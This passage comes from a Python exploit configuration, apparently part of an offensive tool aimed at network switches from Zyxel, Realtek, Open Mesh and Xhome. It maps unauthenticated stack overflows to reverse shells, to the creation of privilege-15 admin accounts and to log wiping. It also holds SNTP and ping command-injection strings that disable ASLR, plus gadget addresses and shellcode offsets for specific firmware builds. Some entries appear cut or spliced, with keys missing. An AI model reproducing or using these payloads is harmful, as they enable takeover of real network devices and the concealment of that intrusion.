'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'authenticated': False,
'json':True,
'encryption':'clear',
'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
'add_uri':'/cgi/httpuploadruncfg.cgi',
'del_query':'{"_ds=1&user=USERNAME&_de=1":{}}',
'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',
'vulnerable': True,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':True,
'authenticated': True,
'enable_uri':'/cgi/set.cgi?cmd=sys_time',
'enable_query':'{"_ds=1&sntp=1&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=sys_time',
'inject_uri':'/cgi/set.cgi?cmd=sys_time',
'inject_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1":{}}',
'check_query':'{"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1":{}}',
'delete_uri':'/cgi/set.cgi?cmd=sys_time',
'delete_query':'{"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=139&dlsType=0&_de=1":{}}',
'disable_uri':'/cgi/set.cgi?cmd=sys_time',
'disable_query':'{"_ds=1&sntp=0&_de=1":{}}',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_diag': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'sys_ping_post_SIGSEGV': True,
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'log_settings_set_cmd':'&empty=1',
'log_settings_set_SIGSEGV':True,
'log_ramClear_cmd':'&target=0',
'log_ramClear_SIGSEGV':True,
'log_fileClear_cmd':'&target=1',
'log_fileClear_SIGSEGV':True,
'workaround':False,
'verify_uri':'',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi/set.cgi?cmd=home_loginAuth',
'content':'{"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1":{}}',
'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&dlsType=0',
'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&dlsType=0',
'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139&dlsType=0',
'sys_timeSettings_set_cmd_enable':'&sntp=1',
'sys_timeSettings_set_cmd_disable':'&sntp=0',
'sys_timeSettings_set_SIGSEGV': True,
'workaround':False,
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',
'logout_uri':'/cgi/set.cgi?cmd=home_logout',
'query':'{"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1":{}}',
'stack':True,
'workaround':False,
'vulnerable': True,
'safe': True
},
},
},
'Zyxel': {
'vendor': 'Zyxel Communications Corp.',
'modulus_uri':'',
'info_leak':False,
'info_leak_JSON':False,
'info_leak_uri':'',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':False,
'encryption':'encode',
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'query':'username=USERNAME&password=PASSWORD&login=1',
'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'vulnerable': False,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':False,
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'LOGGING_SERVICE=0&cmd=4353',
'status':'/cgi-bin/dispatcher.cgi?cmd=4352',
'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',
'clean_logfile_query':'cmd_4364=Clear+file+messages',
'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',
'clean_logmem_query':'cmd_4364=Clear+buffered+messages',
'vulnerable': True,
'safe': True
},
'verify': {
'dispatcher.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'response':'502',
'Content-Type':False,
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(112) + '&password='+ self.random_string(60) + '&STARTUP_BACKUP=1',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'json':False,
'authenticated': False,
'encryption':'clear',
'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------',
'add_uri':'/cgi-bin/httpuploadruncfg.cgi',
'del_query':'',
'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',
'vulnerable': False,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':False,
'authenticated': True,
'enable_uri':'/cgi-bin/dispatcher.cgi',
'enable_query':'sntp_enable=1&cmd=548',
'status_uri':'',
'inject_uri':'/cgi-bin/dispatcher.cgi',
'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
'delete_uri':'/cgi-bin/dispatcher.cgi',
'delete_query':'sntp_Server=+&sntp_Port=139&cmd=550',
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'sntp_enable=0&cmd=548',
'verify_uri':'/tmp/check',
'vulnerable': False,
'safe': True
},
'stack_cgi_diag': {
'vulnerable': False,
},
'stack_cgi_add_account': {
'description':'Stack overflow in "username/password" (PoC: add priv 15 credentials)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_del_account': {
'description':'Stack overflow in "username/password" (PoC: del priv 15 credentials)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',
'log_settings_set_cmd':'&LOGGING_SERVICE=0',
'log_settings_set_SIGSEGV':False,
'log_ramClear_cmd':'&_del=0',
'log_ramClear_SIGSEGV':False,
'log_fileClear_cmd':'&_del=1',
'log_fileClear_SIGSEGV':False,
'workaround':False,
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',
'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',
'sys_timeSntp_set_check':'',
'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=139',
'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',
'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',
'sys_timeSettings_set_SIGSEGV': False,
'workaround':True,
'verify_uri':'/tmp/check',
'vulnerable': False,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&STARTUP_BACKUP=1',
'workaround':False,
'stack':True,
'vulnerable': True,
'safe': True
},
},
},
'Realtek': {
'vendor': 'Realtek',
'modulus_uri':'',
'info_leak':False,
'info_leak_JSON':False,
'info_leak_uri':'',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':False,
'encryption':'clear',
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'query':'username=USERNAME&password=PASSWORD&login=1',
'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'vulnerable': True,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':False,
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'LOGGING_SERVICE=0&cmd=5121',
'status':'',
'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',
'clean_logfile_query':'cmd_5132=Clear+file+messages',
'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',
'clean_logmem_query':'cmd_5132=Clear+buffered+messages',
'vulnerable': True,
'safe': True
},
'verify': {
'httpuploadbakcfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadbakcfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httpuploadruncfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadruncfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httprestorecfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httprestorecfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httpupload.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload.cgi',
'check_uri':'',
'content':'dummy',
'content_check':'Image Signature Error',
'vulnerable': True,
'safe': True
},
'dispatcher.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'response':'502',
'Content-Type':False,
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username=admin&password='+ self.random_string(184) + '&login=1',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'json':False,
'authenticated': False,
'encryption':'md5',
'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
'add_uri':'/cgi-bin/httpuploadruncfg.cgi',
'del_query':'',
'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',
'vulnerable': True,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':False,
'authenticated': True,
'enable_uri':'/cgi-bin/dispatcher.cgi',
'enable_query':'sntp_enable=1&cmd=548',
'status_uri':'',
'inject_uri':'/cgi-bin/dispatcher.cgi',
'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
'delete_uri':'/cgi-bin/dispatcher.cgi',
'delete_query':'sntp_Server=+&sntp_Port=139&cmd=550',
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'sntp_enable=0&cmd=548',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_diag': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'&login=1&_CMD_',
'sys_ping_post_check':'',
'sys_ping_post_SIGSEGV': False,
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
'log_settings_set_cmd':'&LOGGING_SERVICE=0',
'log_settings_set_SIGSEGV':False,
'log_ramClear_cmd':'',
'log_ramClear_SIGSEGV':False,
'log_fileClear_cmd':'',
'log_fileClear_SIGSEGV':False,
'workaround':True,
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',
'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',
'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=139',
'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=139',
'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',
'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',
'sys_timeSettings_set_SIGSEGV': False,
'workaround':False,
'verify_uri':'/tmp/check',
'vulnerable': False,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',
'workaround':True,
'stack':True,
'vulnerable': True,
'safe': True
},
},
},
'OpenMESH': {
'vendor': 'Open Mesh, Inc.',
'modulus_uri':'',
'info_leak':True,
'info_leak_JSON':False,
'info_leak_uri':'/loginMsg.js',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'',
'login_uri':'',
'query':'',
'status_uri':'',
'logout_uri':'',
'vulnerable': False,
'safe': True
},
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':True,
'encryption':'',
'login_uri':'',
'query':'',
'status_uri':'',
'logout_uri':'',
'vulnerable': False,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':True,
'disable_uri':'',
'disable_query':'',
'status':'',
'clean_logfile_uri':'',
'clean_logfile_query':'',
'clean_logmem_uri':'',
'clean_logmem_query':'',
'vulnerable': False,
'safe': True
},
'verify': {
'security.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/security.cgi?login',
'content':'usr=admin&pswrd=' + self.random_string(280),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
'datajson.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'authenticated': False,
'response':'502',
'Content-Type':False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr=admin&pswrd=' + self.random_string(288),
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/sn_httpupload.cgi?',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'authenticated': False,
'json':True,
'encryption':'',
'content':'',
'add_uri':'',
'del_query':'',
'del_uri':'',
'vulnerable': False,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':True,
'authenticated': True,
'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'enable_query':'{"_ds=1&sntpStatus=1&_de=1":{}}',
'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',
'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',
'inject_query':'{"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1":{}}',
'check_query':'{"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123&_de=1":{}}',
'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',
'delete_query':'{"":{}}',
'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',
'disable_query':'{"_ds=1&sntpStatus=0&_de=1":{}}',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'stack_cgi_add_account': {
'description':'Stack overflow in "username/password" (PoC: add priv 15 credentials)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_del_account': {
'description':'Stack overflow in "username/password" (PoC: del priv 15 credentials)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_diag': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'verify_uri':'/conf_tmp/check',
'workaround':False,
'vulnerable': True,
'safe': True
},
'stack_cgi_log': {
'description':'Stack overflow in "username/password" (PoC: Disable/Clean logs)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'log_settings_set_cmd':'&en=0',
'log_settings_set_SIGSEGV':True,
'log_ramClear_cmd':'&ta=0',
'log_ramClear_SIGSEGV':True,
'log_fileClear_cmd':'&ta=1',
'log_fileClear_SIGSEGV':True,
'workaround':False,
'verify_uri':'',
'vulnerable': True,
'safe': True
},
'stack_cgi_sntp': {
'description':'Stack overflow in "username/password" (PoC: Disable ASLR)',
'authenticated': False,
'uri':'/cgi-bin/datajson.cgi?login',
'content':'usr='+ self.random_string(324)+ '_JUMP_&pswrd='+ self.random_string(284) +'_CMD_',
'sys_timeSntp_set_cmd':'&sa=`echo 0 > /proc/sys/kernel/randomize_va_space`&sp=123',
'sys_timeSntp_set_check':'&sa=`cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check`&sp=123',
'sys_timeSntpDel_set_cmd':'&sa=+&sp=123',
'sys_timeSettings_set_cmd_enable':'&sn=1',
'sys_timeSettings_set_cmd_disable':'&sn=0',
'sys_timeSettings_set_SIGSEGV': True,
'workaround':False,
'verify_uri':'/conf_tmp/check',
'vulnerable': True,
'safe': True
},
'heack_cgi_shell': {
'description':'Stack overflow in "username/password" (PoC: reverse shell)',
'authenticated': False,
'login_uri':'/cgi-bin/security.cgi?login',
'logout_uri':'/cgi-bin/security.cgi?logout',
'query':'build=NOP&heap=NOP&to=NOP&higher=addresses&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',
'stack':False,
'workaround':False,
'vulnerable': True,
'safe': True
},
},
},
'Xhome': {
'vendor': 'Xhome',
'modulus_uri':'',
'info_leak':False,
'info_leak_JSON':False,
'info_leak_uri':'',
'xsid':False,
'xsid_uri':'',
'login': {
'description':'Login/Logout on remote device',
'authenticated': True,
'json':False,
'encryption':'clear',
'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'query':'username=USERNAME&password=PASSWORD&login=1',
'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',
'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',
'vulnerable': True,
'safe': True
},
'log':{
'description':'Disable and clean logs',
'authenticated': True,
'json':False,
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'LOGGING_SERVICE=0&cmd=5121',
'status':'',
'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',
'clean_logfile_query':'cmd_5132=Clear+file+messages',
'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',
'clean_logmem_query':'cmd_5132=Clear+buffered+messages',
'vulnerable': True,
'safe': True
},
'verify': {
'httpuploadbakcfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload "backup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadbakcfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httpuploadruncfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/update "running-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpuploadruncfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httprestorecfg.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload "startup-config" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httprestorecfg.cgi',
'check_uri':'',
'content':'dummy',
'content_check':' Invalid config file!!',
'vulnerable': True,
'safe': True
},
'httpupload.cgi':{
'authenticated': False,
'response':'html',
'Content-Type':True,
'description':'Upload/Upgrade "Firmware" (PoC: Create invalid file to verify)',
'uri':'/cgi-bin/httpupload.cgi',
'check_uri':'',
'content':'dummy',
'content_check':'Image Signature Error',
'vulnerable': True,
'safe': True
},
'dispatcher.cgi': {
'description':'Stack overflow in "username/password" (PoC: crash CGI)',
'response':'502',
'Content-Type':False,
'authenticated': False,
'uri':'/cgi-bin/dispatcher.cgi?cmd=1',
'content':'username=admin&password='+ self.random_string(184) + '&login=1',
'check_uri':False,
'content_check':False,
'vulnerable': True,
'safe': True
},
},
'exploit': {
'heack_hydra_shell': {
'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',
'authenticated': False,
'uri':'/cgi-bin/httpupload.cgi?XXX',
'vulnerable': True,
'safe': False
},
'priv15_account': {
'description':'Upload/Update running-config (PoC: add priv 15 credentials)',
'json':False,
'authenticated': False,
'encryption':'md5',
'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" secret encrypted PASSWORD\n\n------',
'add_uri':'/cgi-bin/httpuploadruncfg.cgi',
'del_query':'',
'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',
'vulnerable': True,
'safe': True
},
'sntp': {
'description':'SNTP command injection (PoC: disable ASLR)',
'json':False,
'authenticated': True,
'enable_uri':'/cgi-bin/dispatcher.cgi',
'enable_query':'sntp_enable=1&cmd=548',
'status_uri':'',
'inject_uri':'/cgi-bin/dispatcher.cgi',
'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',
'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',
'delete_uri':'/cgi-bin/dispatcher.cgi',
'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',
'disable_uri':'/cgi-bin/dispatcher.cgi',
'disable_query':'sntp_enable=0&cmd=548',
'verify_uri':'/tmp/check',
'vulnerable': True,
'safe': True
},
'address':0x436D9C,
'account':'&usrName=USERNAME&usrPrivType=15&usrPriv=15',
'vulnerable': True,
},
'stack_cgi_del_account': {
'address':0x437124,
'account':'&_del=1',
'vulnerable': True,
},
'stack_cgi_log': {
'log_settings_set':0x47D760,
'log_ramClear':0x480804,
'log_fileClear':0x480804,
'vulnerable': True,
},
'stack_cgi_sntp': {
'sys_timeSntp_set':0x43BA8C,
'sys_timeSntpDel_set':0x43BA8C,
'sys_timeSettings_set':0x43AF54,
'vulnerable':False,
},
'heack_cgi_shell': {
'cgi':'dispatcher.cgi',
'query':'username='+ self.random_string(100) +'_RA_START&password='+ self.random_string(59) +'&STARTUP_BACKUP=1'+ (('&' + struct.pack('>L',0x2404FF3D) + struct.pack('>L',0x2404FFFF)) * 70) + '&' + struct.pack('>L',0x2404FF3D) +'_SHELLCODE',
'START':0x10010104,
'STOP': 0x104006A0,
'usr_nop': 25,
'pwd_nop': 15,
'align': 0,
'stack':False,
},
},
},
'222-40570': {
'template':'Realtek',
'version':'3.0.0.43126',
'model':'RTL8380-24GE-4GEC',
'uri':'https://www.realtek.com/en/products/communications-network-ics/item/rtl8381m-vb-cg-2',
'exploit': {
'heack_hydra_shell': {
'gadget': 0x40E6DC,
'system': 0x8f99851c,
'handler': 0x24841ea8,
'v0': 7,
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': {
'vulnerable': False,
},
'stack_cgi_diag': {
'sys_ping_post_cmd':'ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space&count=1',
'verify_uri':'/tmp/pingtest_tmp',
'web_sys_ping_post':0x422980,
'vulnerable': True,
},
'stack_cgi_log': {
'log_settings_set':0x481968,
'log_ramClear':0x4847DC,
'log_fileClear':0x4847DC,
'vulnerable': True,
},
'stack_cgi_sntp': {
'sys_timeSntp_set':0x42C8F0,
'sys_timeSntpDel_set':0x42C8F0,
'sys_timeSettings_set':0x42C8F0,
'vulnerable': True,
},
'heack_cgi_shell': {
'cgi':'dispatcher.cgi',
'query':'username=_USRNOP&password=_PWDNOP_RA_START&login=1&_USRNOP_USRNOP_SHELLCODE',
'START':0x7fff7004,
'STOP':0x7fc60000,
'usr_nop': 28,
'pwd_nop': 20,
'align': 0,
'stack':True,
'vulnerable': True,
},
},
},
'13984-12788': {
'template':'OpenMESH',
'version':'01.03.24_180823-1626',
'model':'OMS24',
'uri':'https://www.openmesh.com/',
'exploit': {
'heack_hydra_shell': {
'gadget': 0x40E12C,
'system': 0x8f99851c,
'handler': 0x248405a0,
'v0': 7,
'vulnerable': True,
},
'stack_cgi_add_account': {
'address':0x424890,
'account':'&na=USERNAME&pw=PASSWORD&pv=0&op=1&',
'vulnerable': True,
},
'stack_cgi_del_account': {
'address':0x424890,
'account':'&na=USERNAME&pw=&pv=0&op=0',
'vulnerable': True,
},
'stack_cgi_diag': {
'sys_ping_post_cmd':'&ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space #&mh=30&uid=0',
'sys_ping_post_check':'&ip=127.0.0.1 ; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',
'verify_uri':'/conf_tmp/check',
'web_sys_ping_post': 0x424248,
'vulnerable': True,
},
'stack_cgi_log': {
'log_settings_set':0x43EA88,
'log_ramClear':0x440660,
'log_fileClear':0x440660,
'vulnerable': True,
},
'stack_cgi_sntp': {
'sys_timeSntp_set':0x425260,
'sys_timeSntpDel_set':0x425260,
'sys_timeSettings_set':0x425260,
'vulnerable': True,
},
'heack_cgi_shell': {
'cgi':'security.cgi',
'START':0x100181A0,
'STOP':0x104006A0,
'usr_nop': 987,
'pwd_nop': 69,
'align': 0,
'stack':False,
'vulnerable': True,
},
},
},
'222-64895': {
'template':'Xhome',
'version':'3.0.0.43126',
'model':'DownLoop-G24M',
'uri':'http://www.xhome.com.tw/product_info.php?info=p116_XHome-DownLoop-G24M----------------------------------------.html',
'exploit': {
'heack_hydra_shell': {
'gadget': 0x40E6DC,
'system': 0x8f99851c,
'handler': 0x24841ea8,
'v0': 7,
'vulnerable': True,
},
'stack_cgi_add_account': {
'vulnerable': False,
},
'stack_cgi_del_account': {
'vulnerable': False,
},
'stack_cgi_diag': {
